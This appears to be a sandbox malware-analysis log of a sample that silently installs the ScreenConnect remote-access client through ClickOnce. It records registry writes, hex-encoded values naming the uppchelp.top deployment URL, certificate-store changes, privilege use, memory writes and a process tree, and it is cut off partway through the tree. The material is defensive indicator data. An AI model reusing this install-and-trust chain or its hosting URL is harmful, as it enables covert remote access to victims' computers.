Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files\ScreenConnect.WindowsFileManager.exe.conf = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\DigestValue = 044227fa43b7654032524d6f530f5e9b608e5be4	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\lock!080000008a87580ed40f000058130000000000000000000 = 30303030306664342c30316462316534346364356334363439	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f00750070007000680065006c0070002e0074006f0070002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320034002e0032002e00310030002e0038003900390031002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f00750070007000680065006c0070005c002e0074006f0070002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e5 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\lock!0a0000008a87580ed40f000058130000000000000000000 = 30303030306664342c30316462316534346364356334363439	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\SizeOfStronglyNamedComponent = e04f040000000000	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_10e7526b44f96c8d	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Files\ScreenConnect.ClientService.dll_e781b1c63 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975\lock!020000008a87580ed40f000058130000000000000000000 = 30303030306664342c30316462316534346364356334363439	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\lock!1c0000009a87580ed40f000058130000000000000000000 = 30303030306664342c30316462316534346364356334363439	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_ae = 68747470733a2f2f75707068656c702e746f702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103df	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\implication!scre..tion_25b0fbb6ef7eb094_0018.0002_ae = 68747470733a2f2f75707068656c702e746f702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e322e31302e383939312c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_none_399c0f24bfe6e975	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62a	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\lock!120000009a87580ed40f000058130000000000000000000 = 30303030306664342c30316462316534346364356334363439	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\SizeOfStronglyNamedComponent = e911030000000000	dfsvc.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4464	ScreenConnect.ClientService.exe
4464	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4756	dfsvc.exe
Token: SeDebugPrivilege	4464	ScreenConnect.ClientService.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2152 wrote to memory of 4756	2152	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe	84
PID 2152 wrote to memory of 4756	2152	defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe	84
PID 4756 wrote to memory of 4052	4756	dfsvc.exe	96
PID 4756 wrote to memory of 4052	4756	dfsvc.exe	96
PID 4756 wrote to memory of 4052	4756	dfsvc.exe	96
PID 4052 wrote to memory of 1004	4052	ScreenConnect.WindowsClient.exe	97
PID 4052 wrote to memory of 1004	4052	ScreenConnect.WindowsClient.exe	97
PID 4052 wrote to memory of 1004	4052	ScreenConnect.WindowsClient.exe	97
PID 4464 wrote to memory of 2720	4464	ScreenConnect.ClientService.exe	99
PID 4464 wrote to memory of 2720	4464	ScreenConnect.ClientService.exe	99
PID 4464 wrote to memory of 2720	4464	ScreenConnect.ClientService.exe	99

C:\Users\Admin\AppData\Local\Temp\defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe
"C:\Users\Admin\AppData\Local\Temp\defe3ce55efec3331afaaa98abe87d6a2aa738ddae5b1f840a92368199276023.exe"
1⤵
- Manipulates Digital Signatures
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2152
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe
    "C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4052
  - - C:\Users\Admin\AppData\Local\Apps\2.0\RW1981ZJ.YTC\EC4WJDZT.9PD\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe
